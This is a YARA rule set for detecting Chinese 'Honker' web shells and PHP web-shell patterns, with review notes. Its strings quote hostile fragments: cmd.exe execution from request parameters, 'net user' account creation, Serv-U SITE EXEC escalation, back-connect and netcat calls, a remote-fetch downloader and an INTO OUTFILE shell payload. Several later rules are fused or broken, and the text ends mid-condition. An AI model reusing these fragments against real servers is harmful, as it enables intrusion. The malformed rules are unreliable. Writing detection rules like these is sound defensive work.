Php_Webshell_CN_Honker_Webshell_assembly { strings: $s0 = "response.write oScriptlhn.exec(\"cmd.exe /c\" & request(\"c\")).stdout.readall" fullword ascii /* PEStudio Blacklist: strings */ condition: filesize < 1KB and all of them } rule Php_Webshell_CN_Honker_Webshell_PHP_php8 { strings: $s0 = "<a href=\"http://hi.baidu.com/ca3tie1/home\" target=\"_blank\">Ca3tie1's Blog</a" ascii /* PEStudio 
Blacklist: strings */ $s1 = "function startfile($path = 'dodo.zip')" fullword ascii /* PEStudio Blacklist: strings */ $s3 = "<form name=\"myform\" method=\"post\" action=\"\">" fullword ascii /* PEStudio Blacklist: strings */ $s5 = "$_REQUEST[zipname] = \"dodozip.zip\"; " fullword ascii /* PEStudio Blacklist: strings */ condition: filesize < 25KB and 2 of them } rule Php_Webshell_CN_Honker_Webshell_Tuoku_script_xx { strings: $s0 = "$mysql.=\"insert into `$table`($keys) values($vals);\\r\\n\";" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "$mysql_link=@mysql_connect($mysql_servername , $mysql_username , $mysql_password" ascii /* PEStudio Blacklist: strings */ $s16 = "mysql_query(\"SET NAMES gbk\");" fullword ascii /* PEStudio Blacklist: strings */ condition: filesize < 2KB and all of them } rule Jsp_Webshell_CN_Honker_Webshell_JSPMSSQL { strings: $s1 = "<form action=\"?action=operator&cmd=execute\"" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "String sql = request.getParameter(\"sqlcmd\");" fullword ascii /* PEStudio Blacklist: strings */ condition: filesize < 35KB and all of them } rule Php_Webshell_CN_Honker_Webshell_Injection_Transit_jmPost { strings: $s1 = "response.write PostData(JMUrl,JmStr,JmCok,JmRef)" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "JmdcwName=request(\"jmdcw\")" fullword ascii /* PEStudio Blacklist: strings */ condition: filesize < 9KB and all of them } rule Asp_Webshell_CN_Honker_Webshell_ASP_web_asp { strings: $s0 = "<FORM method=post target=_blank>ShellUrl: <INPUT " fullword ascii /* PEStudio Blacklist: strings */ $s1 = "\" >[Copy code]</a> 4ngr7   </td>" fullword ascii condition: filesize < 13KB and all of them } rule Asp_Webshell_CN_Honker_Webshell_wshell_asp { strings: $s1 = "file1.Write(\"<%response.clear:execute request(\\\"root\\\"):response.End%>\");" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "hello word ! 
" fullword ascii /* PEStudio Blacklist: strings */ $s3 = "root.asp " fullword ascii condition: filesize < 5KB and all of them } rule Asp_Webshell_CN_Honker_Webshell_ASP_asp404 { strings: $s0 = "temp1 = Len(folderspec) - Len(server.MapPath(\"./\")) -1" fullword ascii /* PEStudio Blacklist: strings */ $s1 = "<form name=\"form1\" method=\"post\" action=\"<%= url%>?action=chklogin\">" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "<td> <a href=\"<%=tempurl+f1.name%>\" target=\"_blank\"><%=f1.name%></a></t" ascii /* PEStudio Blacklist: strings */ condition: filesize < 113KB and all of them } rule Asp_Webshell_CN_Honker_Webshell_Serv_U_asp { strings: $s1 = "newuser = \"-SETUSERSETUP\" & vbCrLf & \"-IP=0.0.0.0\" & vbCrLf & \"-PortNo=\" &" ascii /* PEStudio Blacklist: strings */ $s2 = "<td><input name=\"c\" type=\"text\" id=\"c\" value=\"cmd /c net user goldsun lov" ascii /* PEStudio Blacklist: strings */ $s3 = "deldomain = \"-DELETEDOMAIN\" & vbCrLf & \"-IP=0.0.0.0\" & vbCrLf & \" PortNo=\"" ascii /* PEStudio Blacklist: strings */ condition: filesize < 30KB and 2 of them } rule Php_Webshell_CN_Honker_Webshell_cfm_list { strings: $s1 = "<TD><a href=\"javascript:ShowFile('#mydirectory.name#')\">#mydirectory.name#</a>" ascii /* PEStudio Blacklist: strings */ $s2 = "<TD>#mydirectory.size#</TD>" fullword ascii condition: filesize < 10KB and all of them } rule Php_Webshell_CN_Honker_Webshell_PHP_php2 { strings: $s1 = "$OOO0O0O00=__FILE__;$OOO000000=urldecode('" ascii /* PEStudio Blacklist: strings */ $s2 = "<?php // Black" fullword ascii condition: filesize < 12KB and all of them } rule Php_Webshell_CN_Honker_Webshell_Tuoku_script_oracle { strings: $s1 = "String url=\"jdbc:oracle:thin:@localhost:1521:orcl\";" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "String user=\"oracle_admin\";" fullword ascii /* PEStudio Blacklist: strings */ $s3 = "String sql=\"SELECT 1,2,3,4,5,6,7,8,9,10 from user_info\";" fullword ascii condition: filesize < 7KB and all of them } 
// C# page: File.Delete probe, "Fport_TextBox" control and an hkmjj.com credit line.
// All three strings required, file under 11KB.
rule Asp_Webshell_CN_Honker_Webshell_ASPX_aspx4
{
    strings:
        $s4 = "File.Delete(cdir.FullName + \"\\\\test\");" fullword ascii  // PEStudio blacklist
        $s5 = "start<asp:TextBox ID=\"Fport_TextBox\" runat=\"server\" Text=\"c:\\\" Width=\"60" ascii  // PEStudio blacklist
        $s6 = "<div>Code By <a href =\"http://www.hkmjj.com\">Www.hkmjj.Com</a></div>" fullword ascii
    condition:
        filesize < 11KB and all of them
}

// C# page embedding a Serv-U -SETUSERSETUP blob, an SQLExec dropdown and
// process/registry postback handlers. Any two strings, file under 353KB.
rule Asp_Webshell_CN_Honker_Webshell_ASPX_aspx
{
    strings:
        $s0 = "string iVDT=\"-SETUSERSETUP\\r\\n-IP=0.0.0.0\\r\\n-PortNo=52521\\r\\n-User=bin" ascii  // PEStudio blacklist
        $s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii  // PEStudio blacklist
        $s2 = "td.Text=\"<a href=\\\"javascript:Bin_PostBack('urJG','\"+dt.Rows[j][\"ProcessID" ascii  // PEStudio blacklist
        $s3 = "vyX.Text+=\"<a href=\\\"javascript:Bin_PostBack('Bin_Regread','\"+MVVJ(rootkey)+" ascii  // PEStudio blacklist
    condition:
        filesize < 353KB and 2 of them
}

// VBScript httpopen() calls posting a LoginID/Password form to a local
// /Admin/XML/User.xml endpoint. VBScript content despite the Php_ prefix.
rule Php_Webshell_CN_Honker_Webshell_su7_x_9_x
{
    strings:
        $s0 = "returns=httpopen(\"LoginID=\"&user&\"&FullName=&Password=\"&pass&\"&ComboPasswor" ascii  // PEStudio blacklist
        $s1 = "returns=httpopen(\"\",\"POST\",\"http://127.0.0.1:\"&port&\"/Admin/XML/User.xml?" ascii  // PEStudio blacklist
    condition:
        filesize < 59KB and all of them
}

// ColdFusion <cfexecute> of cmd.exe plus a temp-directory file probe.
// $s0 is the same literal as $s1 of Php_Webshell_CN_Honker_Webshell_cmfshell.
rule Php_Webshell_CN_Honker_Webshell_cfmShell
{
    strings:
        $s0 = "<cfexecute name=\"C:\\Winnt\\System32\\cmd.exe\"" fullword ascii  // PEStudio blacklist
        $s4 = "<cfif FileExists(\"#GetTempDirectory()#foobar.txt\") is \"Yes\">" fullword ascii
    condition:
        filesize < 4KB and all of them
}

// ASP page with a ShellPath defaulting to cmd.exe, a login cookie and a
// CM.exec(ShellPath & " /c " & DefCmd) call. All strings, file under 150KB.
rule Asp_Webshell_CN_Honker_Webshell_ASP_asp4
{
    strings:
        $s2 = "if ShellPath=\"\" Then ShellPath = \"cmd.exe\"" fullword ascii  // PEStudio blacklist
        $s6 = "Response.Cookies(Cookie_Login) = sPwd" fullword ascii  // PEStudio blacklist
        $s8 = "Set DD=CM.exec(ShellPath&\" /c \"&DefCmd)" fullword ascii  // PEStudio blacklist
    condition:
        filesize < 150KB and all of them
}

// ASP page talking to a local Serv-U admin port (/lake2), with fixed FTP
// credentials in its output. Any two strings, file under 17KB.
rule Php_Webshell_CN_Honker_Webshell_Serv_U_2_admin_by_lake2
{
    strings:
        $s1 = "xPost3.Open \"POST\", \"http://127.0.0.1:\"& port &\"/lake2\", True" fullword ascii  // PEStudio blacklist
        $s2 = "response.write \"FTP user lake pass admin123 :)<br><BR>\"" fullword ascii  // PEStudio blacklist
        $s8 = "<p>Serv-U Local Get SYSTEM Shell with ASP" fullword ascii  // PEStudio blacklist
        $s9 = "\"-HomeDir=c:\\\\\" & vbcrlf & \"-LoginMesFile=\" & vbcrlf & \"-Disable=0\" & vb" ascii  // PEStudio blacklist
    condition:
        filesize < 17KB and 2 of them
}

// PHP popen() fallback branch plus a cf('/tmp/.bc', $back_connect) call.
rule Php_Webshell_CN_Honker_Webshell_PHP_php3
{
    strings:
        $s1 = "} elseif(@is_resource($f = @popen($cfe,\"r\"))) {" fullword ascii  // PEStudio blacklist
        $s2 = "cf('/tmp/.bc',$back_connect);" fullword ascii  // PEStudio blacklist
    condition:
        filesize < 8KB and all of them
}

// ASP page hitting a local /goldsun/upadmin/s2 URL and building a Serv-U
// -SETUSERSETUP blob. Any two strings, file under 30KB.
// $s2 is the same literal as $s1 of Asp_Webshell_CN_Honker_Webshell_Serv_U_asp.
rule Php_Webshell_CN_Honker_Webshell_Serv_U_by_Goldsun
{
    strings:
        $s1 = "b.open \"GET\", \"http://127.0.0.1:\" & ftpport & \"/goldsun/upadmin/s2\", True," ascii  // PEStudio blacklist
        $s2 = "newuser = \"-SETUSERSETUP\" & vbCrLf & \"-IP=0.0.0.0\" & vbCrLf & \"-PortNo=\" &" ascii  // PEStudio blacklist
        $s3 = "127.0.0.1:<%=port%>," fullword ascii  // PEStudio blacklist
        $s4 = "GName=\"http://\" & request.servervariables(\"server_name\")&\":\"&request.serve" ascii  // PEStudio blacklist
    condition:
        filesize < 30KB and 2 of them
}

// Minified PHP database front-end: dumpTable() emitting a UTF-8 BOM and the
// DB=="" navigation branch. Both strings, file under 600KB.
rule Php_Webshell_CN_Honker_Webshell_PHP_php10
{
    strings:
        $s1 = "dumpTable($N,$M,$Hc=false){if($_POST[\"format\"]!=\"sql\"){echo\"\\xef\\xbb\\xbf" ascii  // PEStudio blacklist
        $s2 = "';if(DB==\"\"||!$od){echo\"<a href='\".h(ME).\"sql='\".bold(isset($_GET[\"sql\"]" ascii  // PEStudio blacklist
    condition:
        filesize < 600KB and all of them
}

// PHP ftpcmd() helper sending "SITE EXEC ... cmd.exe /c ..." over an FTP socket.
rule Php_Webshell_CN_Honker_Webshell_Serv_U_servu
{
    strings:
        $s0 = "fputs ($conn_id, \"SITE EXEC \".$dir.\"cmd.exe /c \".$cmd.\"\\r\\n\");" fullword ascii  // PEStudio blacklist
        $s1 = "function ftpcmd($ftpport,$user,$password,$dir,$cmd){" fullword ascii  // PEStudio blacklist
    condition:
        filesize < 41KB and all of them
}

// JSP port-forwarder parameters (remoteIP, localIP, localPort fixed to "3390").
rule Jsp_Webshell_CN_Honker_Webshell_portRecall_jsp2
{
    strings:
        $s0 = "final String remoteIP =request.getParameter(\"remoteIP\");" fullword ascii  // PEStudio blacklist
        $s4 = "final String localIP = request.getParameter(\"localIP\");" fullword ascii  // PEStudio blacklist
        $s20 = "final String localPort = \"3390\";//request.getParameter(\"localPort\");" fullword ascii  // PEStudio blacklist
    condition:
        filesize < 23KB and all of them
}

// ASP.NET page with a txtPass password check and a PATH_INFO path echo.
// The file must begin with "<%" (0x253c little-endian) and stay under 9KB.
rule Asp_Webshell_CN_Honker_Webshell_ASPX_aspx2
{
    strings:
        $s0 = "if (password.Equals(this.txtPass.Text))" fullword ascii  // PEStudio blacklist
        $s1 = "<head runat=\"server\">" fullword ascii  // PEStudio blacklist
        $s2 = ":<asp:TextBox runat=\"server\" ID=\"txtPass\" Width=\"400px\"></asp:TextBox>" fullword ascii  // PEStudio blacklist
        $s3 = "this.lblthispath.Text = Server.MapPath(Request.ServerVariables[\"PATH_INFO\"]);" fullword ascii  // PEStudio blacklist
    condition:
        uint16(0) == 0x253c and filesize < 9KB and all of them
}
// VBScript shell front-end: a "command.com" constant and a cmd.exe argument check.
rule Asp_Webshell_CN_Honker_Webshell_ASP_hy2006a
{
    strings:
        $s15 = "Const myCmdDotExeFile = \"command.com\"" fullword ascii  // PEStudio blacklist
        $s16 = "If LCase(appName) = \"cmd.exe\" And appArgs <> \"\" Then" fullword ascii  // PEStudio blacklist
    condition:
        filesize < 406KB and all of them
}

// PHP multi-tool: FTP "site exec" buffer, passthru() fallback and a perl
// /tmp/spider_bc back-connect call. All three strings, file under 621KB.
rule Php_Webshell_CN_Honker_Webshell_PHP_php1
{
    strings:
        $s7 = "$sendbuf = \"site exec \".$_POST[\"SUCommand\"].\"\\r\\n\";" fullword ascii  // PEStudio blacklist
        $s8 = "elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_c" ascii  // PEStudio blacklist
        $s18 = "echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport" ascii  // PEStudio blacklist
    condition:
        filesize < 621KB and all of them
}

// JSP shell defaults: "cmd.exe /c set" and "cmd.exe /c net start" logged to SHELL_DIR.
rule Jsp_Webshell_CN_Honker_Webshell_jspshell2
{
    strings:
        $s10 = "if (cmd == null) cmd = \"cmd.exe /c set\";" fullword ascii  // PEStudio blacklist
        $s11 = "if (program == null) program = \"cmd.exe /c net start > \"+SHELL_DIR+\"/Log.txt" ascii  // PEStudio blacklist
    condition:
        filesize < 424KB and all of them
}

// Single canned statement: select shell('...cmd.exe /c net user b4che10r ...').
// One string, file under 1087KB.
rule Php_Webshell_CN_Honker_Webshell_PHP_php9
{
    strings:
        $s1 = "Str[17] = \"select shell('c:\\windows\\system32\\cmd.exe /c net user b4che10r ab" ascii  // PEStudio blacklist
    condition:
        filesize < 1087KB and all of them
}

// Hard-coded lcx.jsp forwarder URL with fixed IPs and ports; file under 1KB.
rule Jsp_Webshell_CN_Honker_Webshell_portRecall_jsp
{
    strings:
        $s0 = "lcx.jsp?localIP=202.91.246.59&localPort=88&remoteIP=218.232.111.187&remotePort=2" ascii  // PEStudio blacklist
    condition:
        filesize < 1KB and all of them
}

// C# page spawning the path in txtRarPath with archive arguments, plus a
// "_Debug" console trace. Both strings, file under 100KB.
rule Asp_Webshell_CN_Honker_Webshell_ASPX_aspx3
{
    strings:
        $s0 = "Process p1 = Process.Start(\"\\\"\" + txtRarPath.Value + \"\\\"\", \" a -y -k -m" ascii  // PEStudio blacklist
        $s12 = "if (_Debug) System.Console.WriteLine(\"\\ninserting filename into CDS:" ascii  // PEStudio blacklist
    condition:
        filesize < 100KB and all of them
}

// One-line ASPX loader: Assembly.Load of a Request.BinaryRead body sized by a
// cookie, under a ValidateRequest="false" page directive. File under 1KB.
rule Asp_Webshell_CN_Honker_Webshell_ASPX_shell_shell
{
    strings:
        $s0 = "<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cook" ascii  // PEStudio blacklist
        $s1 = "<%@ Page Language=\"C#\" ValidateRequest=\"false\" %>" fullword ascii  // PEStudio blacklist
    condition:
        filesize < 1KB and all of them
}

// Shared UI of the php1/php7/php9 variants: WScript.shell menu link, the JS
// that fills the "cmd" field from Str[], and the canned copy command Str[7].
rule Php_Webshell_CN_Honker_Webshell__php1_php7_php9
{
    strings:
        $s1 = "<a href=\"?s=h&o=wscript\">[WScript.shell]</a> " fullword ascii  // PEStudio blacklist
        $s2 = "document.getElementById('cmd').value = Str[i];" fullword ascii
        $s3 = "Str[7] = \"copy c:\\\\\\\\1.php d:\\\\\\\\2.php\";" fullword ascii
    condition:
        filesize < 300KB and all of them
}

// VBScript raw-FTP sequence (User/Pass/site exec) against a Serv-U instance.
// All three strings, file under 444KB.
rule Asp_Webshell_CN_Honker_Webshell__Serv_U_by_Goldsun_asp3_Serv_U_asp
{
    strings:
        $s1 = "c.send loginuser & loginpass & mt & deldomain & quit" fullword ascii  // PEStudio blacklist
        $s2 = "loginpass = \"Pass \" & pass & vbCrLf" fullword ascii  // PEStudio blacklist
        $s3 = "b.send \"User go\" & vbCrLf & \"pass od\" & vbCrLf & \"site exec \" & cmd & vbCr" ascii
    condition:
        filesize < 444KB and all of them
}

// ASP database browser: searchfile form, DbName table header and connection
// teardown. $s2 ends with a trailing space on purpose. File under 341KB.
rule Asp_Webshell_CN_Honker_Webshell__asp4_asp4_MSSQL__MSSQL_
{
    strings:
        $s0 = "\"<form name=\"\"searchfileform\"\" action=\"\"?action=searchfile\"\" method=\"" ascii  // PEStudio blacklist
        $s1 = "\"<TD ALIGN=\"\"Left\"\" colspan=\"\"5\"\">[\"& DbName & \"]" fullword ascii
        $s2 = "Set Conn = Nothing " fullword ascii
    condition:
        filesize < 341KB and all of them
}

// VBScript POST relay with a "+" -> "%2B" re-encoding step. $s1 is shared with
// Php_Webshell_CN_Honker_Webshell_Injection_Transit_jmPost. File under 7342KB.
rule Php_Webshell_CN_Honker_Webshell__Injection_jmCook_jmPost_ManualInjection
{
    strings:
        $s1 = "response.write PostData(JMUrl,JmStr,JmCok,JmRef)" fullword ascii  // PEStudio blacklist
        $s2 = "strReturn=Replace(strReturn,chr(43),\"%2B\") 'JMDCW" fullword ascii
    condition:
        filesize < 7342KB and all of them
}

// ColdFusion <cfexecute> of cmd.exe with a self-posting form. $s1 is the same
// literal as $s0 of Php_Webshell_CN_Honker_Webshell_cfmShell.
// NOTE(review): $s2 was line-wrapped in the captured source; it is joined here
// on the assumption the wrap only inserted a line break -- confirm upstream.
rule Php_Webshell_CN_Honker_Webshell_cmfshell
{
    strings:
        $s1 = "<cfexecute name=\"C:\\Winnt\\System32\\cmd.exe\"" fullword ascii  // PEStudio blacklist
        $s2 = "<form action=\"<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>\" method=\"post\">" fullword ascii  // PEStudio blacklist
    condition:
        filesize < 4KB and all of them
}

// Tiny netcat-listener stub; the file must begin with the bytes "PH"
// (0x4850 little-endian) and stay under 1KB.
rule Php_Webshell_CN_Honker_Webshell_PHP_php4
{
    strings:
        $s0 = "nc -l -vv -p port(" fullword ascii  // PEStudio blacklist
    condition:
        uint16(0) == 0x4850 and filesize < 1KB and all of them
}

// Failure banner of a local kernel exploit -- not web-shell code, despite the
// Php_Webshell_ prefix. One string, file under 56KB.
rule Php_Webshell_CN_Honker_Webshell_Linux_2_6_Exploit
{
    strings:
        $s0 = "[+] Failed to get root :( Something's wrong. Maybe the kernel isn't vulnerable?" fullword ascii
    condition:
        filesize < 56KB and all of them
}

// ASP page echoing its own mapped path, a "webshell" banner and a fixed
// Userpwd = "admin". All three strings, file under 10KB.
rule Asp_Webshell_CN_Honker_Webshell_ASP_asp2
{
    strings:
        $s1 = "<%=server.mappath(request.servervariables(\"script_name\"))%>" fullword ascii  // PEStudio blacklist
        $s2 = "webshell</font> <font color=#00FF00>" fullword ascii  // PEStudio blacklist
        $s3 = "Userpwd = \"admin\" 'User Password" fullword ascii  // PEStudio blacklist
    condition:
        filesize < 10KB and all of them
}

// "ScanPass" credential scanner by 4ngel: session-stored host list, ftp_connect
// loop and the page title. Any three of five strings, file under 20KB.
rule Php_Webshell_CN_Honker_Webshell_FTP_MYSQL_MSSQL_SSH
{
    strings:
        $s1 = "$_SESSION['hostlist'] = $hostlist = $_POST['hostlist'];" fullword ascii  // PEStudio blacklist
        $s2 = "Codz by <a href=\"http://www.sablog.net/blog\">4ngel</a><br />" fullword ascii
        $s3 = "if ($conn_id = @ftp_connect($host, $ftpport)) {" fullword ascii  // PEStudio blacklist
        $s4 = "$_SESSION['sshport'] = $mssqlport = $_POST['sshport'];" fullword ascii  // PEStudio blacklist
        $s5 = "<title>ScanPass(FTP/MYSQL/MSSQL/SSH) by 4ngel" fullword ascii  // PEStudio blacklist
    condition:
        filesize < 20KB and 3 of them
}

// ASP downloader stub: fetches 1.txt from i0day.com and saves it as test.asp.
// All three strings, file under 1KB.
rule Asp_Webshell_CN_Honker_Webshell_ASP_shell
{
    strings:
        $s1 = "xPost.Open \"GET\",\"http://www.i0day.com/1.txt\",False //" fullword ascii  // PEStudio blacklist
        $s2 = "sGet.SaveToFile Server.MapPath(\"test.asp\"),2 //" fullword ascii  // PEStudio blacklist
        $s3 = "http://hi.baidu.com/xahacker/fuck.txt" fullword ascii
    condition:
        filesize < 1KB and all of them
}
/* NOTE(review): two rules in this run do not load as captured.
   - Php_Webshell_CN_Honker_Webshell_PHP_php7: $s0 contains a raw line break between "'.$ports[$i].'" and
     "'; ob_flush()", and its tail reads "echo ''; return true;". YARA text strings cannot span lines, and
     the empty echo suggests markup between the two fragments was dropped during extraction. Restore the
     literal from the upstream rule set rather than guessing it.
   - Php_Webshell_CN_Honker_Webshell_Tuoku_script_mssql_2: $s3 opens a literal that runs across a blank
     line and resumes at "    ServerIP:   ". Same problem, same remedy.
   The other rules on these lines (ASP_rootkit, jspshell, Serv_U_serv_u, WebShell, ASP_asp1) look intact. */
rule Php_Webshell_CN_Honker_Webshell_PHP_php7 { strings: $s0 = "---> '.$ports[$i].'
    '; ob_flush(); flush(); } } echo ''; return true; }" ascii /* PEStudio Blacklist: strings */ $s1 = "$getfile = isset($_POST['downfile']) ? $_POST['downfile'] : ''; $getaction = iss" ascii /* PEStudio Blacklist: strings */ condition: filesize < 300KB and all of them } rule Asp_Webshell_CN_Honker_Webshell_ASP_rootkit { strings: $s0 = "set ss=zsckm.get(\"Win32_ProcessSta\"&uyy&\"rtup\")" fullword ascii /* PEStudio Blacklist: strings */ $s1 = "If jzgm=\"\"Then jzgm=\"cmd.exe /c net user\"" fullword ascii /* PEStudio Blacklist: strings */ condition: filesize < 80KB and all of them } rule Jsp_Webshell_CN_Honker_Webshell_jspshell { strings: $s1 = "else if(Z.equals(\"M\")){String[] c={z1.substring(2),z1.substring(0,2),z2};Proce" ascii /* PEStudio Blacklist: strings */ $s2 = "String Z=EC(request.getParameter(Pwd)+\"\",cs);String z1=EC(request.getParameter" ascii /* PEStudio Blacklist: strings */ condition: filesize < 30KB and all of them } rule Php_Webshell_CN_Honker_Webshell_Serv_U_serv_u { strings: $s1 = "@readfile(\"c:\\\\winnt\\\\system32\\" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "$sendbuf = \"PASS \".$_POST[\"password\"].\"\\r\\n\";" fullword ascii /* PEStudio Blacklist: strings */ $s3 = "$cmd=\"cmd /c rundll32.exe $path,install $openPort $activeStr\";" fullword ascii /* PEStudio Blacklist: strings */ condition: filesize < 435KB and all of them } rule Php_Webshell_CN_Honker_Webshell_WebShell { strings: $s1 = "$login = crypt($WebShell::Configuration::password, $salt);" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "my $error = \"This command is not available in the restricted mode.\\n\";" fullword ascii /* PEStudio Blacklist: strings */ $s3 = "warn \"command: '$command'\\n\";" fullword ascii /* PEStudio Blacklist: strings */ condition: filesize < 30KB and 2 of them } rule Php_Webshell_CN_Honker_Webshell_Tuoku_script_mssql_2 { strings: $s1 = "sqlpass=request(\"sqlpass\")" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "set 
file=fso.createtextfile(server.mappath(request(\"filename\")),8,true)" fullword ascii /* PEStudio Blacklist: strings */ $s3 = "

    ServerIP:   " fullword ascii /* PEStudio Blacklist: strings */ condition: filesize < 3KB and all of them } rule Asp_Webshell_CN_Honker_Webshell_ASP_asp1 { strings: $s1 = "SItEuRl=" ascii $s2 = "<%@ LANGUAGE = VBScript.Encode %><%" fullword ascii /* PEStudio Blacklist: strings */ $s3 = "Server.ScriptTimeout=" ascii /* PEStudio Blacklist: strings */ condition: filesize < 200KB and all of them } /* NOTE(review): Php_Webshell_webshell_php_gzinflated as captured is not loadable and should be restored from upstream, not patched: $gfp3..$gfp12 and $php_short are each declared twice; the "// elgg" and "// ... ;)" line comments swallow the rest of this physical line now that the rule sits on one line; the condition (next line) references $no_*, $php_new* and $sstring*, none of which is declared here; and the $payload* / $fp1 strings are never used by that condition. */ rule Php_Webshell_webshell_php_gzinflated { strings: $payload2 = /eval\s?\(\s?("\?>".)?gzinflate\s?\(\s?base64_decode\s?\(/ ascii nocase $payload4 = /eval\s?\(\s?("\?>".)?gzuncompress\s?\(\s?(base64_decode|gzuncompress)/ ascii nocase $payload6 = /eval\s?\(\s?("\?>".)?gzdecode\s?\(\s?base64_decode\s?\(/ ascii nocase $payload7 = /eval\s?\(\s?base64_decode\s?\(/ ascii nocase $payload8 = /eval\s?\(\s?pack\s?\(/ ascii nocase $fp1 = "YXBpLnRlbGVncmFtLm9" $gfp1 = "eval(\"return [$serialised_parameter" // elgg $gfp2 = "$this->assert(strpos($styles, $" $gfp3 = "$module = new $_GET['module']($_GET['scope']);" $gfp4 = "$plugin->$_POST['action']($_POST['id']);" $gfp5 = "$_POST[partition_by]($_POST[" $gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);" $gfp7 = "The above example code can be easily exploited by passing in a string such as" // ... ;) $gfp8 = "Smarty_Internal_Debug::start_render($_template);" $gfp9 = "?p4yl04d=UNION%20SELECT%20'',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php" $gfp10 = "[][}{;|]\\|\\\\[+=]\\|?" $gfp11 = "(eval (getenv \"EPROLOG\")))" $gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ" $php_short = "\"" nocase wide ascii $php_short = "assert(strpos($styles, $" $gfp3 = "$module = new $_GET['module']($_GET['scope']);" $gfp4 = "$plugin->$_POST['action']($_POST['id']);" $gfp5 = "$_POST[partition_by]($_POST[" $gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);" $gfp7 = "The above example code can be easily exploited by passing in a string such as" // ... 
/* NOTE(review): this line is the tail of Php_Webshell_webshell_php_gzinflated (see the note at its
   "rule" keyword on the previous line): a second copy of $gfp8..$gfp12, the $inp* strings, and a condition
   that references undeclared $no_*, $php_new* and $sstring* families. Restore from upstream. */
;) $gfp8 = "Smarty_Internal_Debug::start_render($_template);" $gfp9 = "?p4yl04d=UNION%20SELECT%20'',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php" $gfp10 = "[][}{;|]\\|\\\\[+=]\\|?" $gfp11 = "(eval (getenv \"EPROLOG\")))" $gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ" $inp1 = "php://input" wide ascii $inp2 = /_GET\s?\[/ ascii $inp3 = /\(\s?\$_GET\s?\)/ ascii $inp4 = /_POST\s?\[/ ascii $inp5 = /\(\s?\$_POST\s?\)/ ascii $inp6 = /_REQUEST\s?\[/ ascii $inp7 = /\(\s?\$_REQUEST\s?\)/ ascii $inp15 = "_SERVER['HTTP_" wide ascii $inp16 = "_SERVER[\"HTTP_" wide ascii $inp17 = /getenv[\t ]{0,20}\([\t ]{0,20}['"]HTTP_/ ascii $inp18 = "array_values($_SERVER)" wide ascii $inp19 = /file_get_contents\("https?:\/\// ascii condition: filesize < 700KB and ( ( ( $php_short in (0..100) or $php_short in (filesize-1000..filesize) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and not ( any of ( $gfp* ) ) and ( 2 of ( $sstring* ) or ( 1 of ( $sstring* ) and ( any of ( $inp* ) ) ) ) } /* NOTE(review): Php_Webshell_webshell_php_dynamic_big does not load as captured. $new_php2 is not a valid declaration: it opens with "" and continues as a bare alternation that ends three lines down with ")/ ascii", i.e. the head of one literal and the tail of a regex were fused and whatever sat between them is gone. The condition also references $php_short and $dynamic*, neither declared in this rule, and with $gen_bit_sus74 as the only $gen_bit_sus* string the "2/3/4 of ($gen_bit_sus*)" alternatives can never hold. Restore the rule from upstream. */ rule Php_Webshell_webshell_php_dynamic_big { strings: $dex = { 64 65 ( 78 | 79 ) 0a 30 } $pack = { 50 41 43 4b 00 00 00 02 00 } $new_php2 = ""\.|\$cmd|\$password="|\$password='|whoami|portscan|Cyber|\/bin\/sh|"execute"|'cmd'|dumper|\.ssh\/authorized_keys| \^ \$|suhosin|bypass|Shell|shell_|
    |
    |crack|Content-Transfer-Encoding: Binary)/ ascii
    	// NOTE(review): the only surviving $gen_bit_sus* string; see the note at the rule header.
    	$gen_bit_sus74 = /\btouch\(\$[^,]{1,30},/  ascii
    	$gen_much_sus37 = /(rootkit|Rootkit|grayhat|hacker|hacked|HACKED|Hacker|TVqQAAMAAA|Exploit|exploit|'unsafe|"unsafe|nishang|McAfee|antivirus|pcAnywhere|WScript\.Shell\.1|hidded shell|WebShell|Web Shell)/ ascii
    	$gen_much_sus38 = /(eval\(eval\(|\("\/\*\/"|\/\*\/\/\*\/|"u"\+"e|q"\+"u"|"\+"\("\+"|a"\+"l"|"e"\+"v|u"\+"n"\+"s|\/\*-\/\*-\*\/)/ ascii
    	$gen_much_sus48 = /(-name config\.inc\.php|grep -li password|-perm -02000|-perm -04000|_\.=\$_|\+\+;\$|\+\+; \$|_=\$\$_|-Expire=0|PasswordType=Regular|Shell\.Users|unlink\(__FILE__\))/  ascii
    	$gen_much_sus75 = /(password crack|mysqlDll\.dll|net user|suhosin\.executor\.disable_|disabled_suhosin|fopen\("\.htaccess","w|strrev\(['"]|PHPShell|PHP Shell|phpshell|PHPshell|deface|Deface|backdoor|r00t|xp_cmdshell)/ ascii
    	$gif = { 47 49 46 38 }
    condition:
    	// Excludes PE (MZ), DEX, PACK and ZIP (PK) headers, then requires a PHP marker, a $dynamic* hit
    	// (undeclared here) and a size-scaled count of suspicious strings, or a GIF header at offset 0.
